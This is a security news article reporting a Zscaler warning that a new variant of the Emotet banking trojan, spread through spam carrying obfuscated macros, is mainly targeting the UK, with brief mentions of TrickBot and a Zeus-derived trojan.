Banking Trojan Emotet Returns ‘With A Vengeance’ To Strike UK

The banking trojan Emotet has evolved and now a new variant is ‘now back with a vengeance’ and has the UK in its sights.

This is the warning from security researcher Zscaler, which said that 76 percent of Emotet’s attacks so far have been aimed at the United Kingdom.

The trojan first reared its head back in 2014, and it is main mission in life is to steal banking credentials and harvest emails.

Emotet Trojan

According to Zscaler the Emotet trojan is commonly distributed through documents with highly obfuscated macros. These macros contain “payloads to download and install the Trojan onto a victim’s machine.”

Emotet has also been known to download other malware nastiness on infected hosts and three years ago it “wreaked havoc in Europe and the United States.”

But now the Zscaler Threat Research team has been monitoring the new variant of Emotet since April 2017 and has recently seen a spike in Emotet related spam activity.

Emotet is described as multi-component malware which specialises in stealing credentials from browsers and mail clients. It also conducts bank theft via man-in-the-browser attack, email harvesting and propagation through spam emails from infected systems.

These spam campaigns often contain a malicious file attachment or a link to a malicious URL hosting a JavaScript or a document file. This in turn downloads and installs the Emotet payload.

But the new variant is utilising malicious files with highly obfuscated macro to serve the emotet payload.

“Obfuscated VBS macro code contains predetermined URLs with code to download and install Emotet payload on the victim machine,” warned Zscaler. “The downloaded executable is packed with a custom packer which has encrypted data hiding the Emotet executable and the code to load it. When executed, this data is decrypted in the memory using a custom algorithm.”

“Upon successful infection, Emotet registers the compromised host with the C&C server by sending information such as computer name, CPU architecture and OS version, as well as a list of active processes and whether they were executed with administrator privilege,” the security specialist warned.

Banking Trojan

Zscaler ThreatLabZ said it was actively monitoring this threat and will continue to ensure coverage for Zscaler customers.

Banking trojans are unfortunately fairly common nowadays. In April IBM security researchers  warned about a change in tactics by the operators of the TrickBot Trojan.

The researchers found that private banks, private wealth management firms, investment banking, and even a retirement insurance and annuity company were now in its cross-hairs.

Also this year security specialists Dr Web found a banking trojan based on the source code of the infamous Zeus malware.

Dubbed Trojan.PWS.Sphinx.2, that trojan’s main purpose it to inject malicious content into webpages, for example a fake form for inputting login and password details in order for cyber criminals to secretly harvest useful credentials for people browsing the web.

Quiz: Are you a security pro?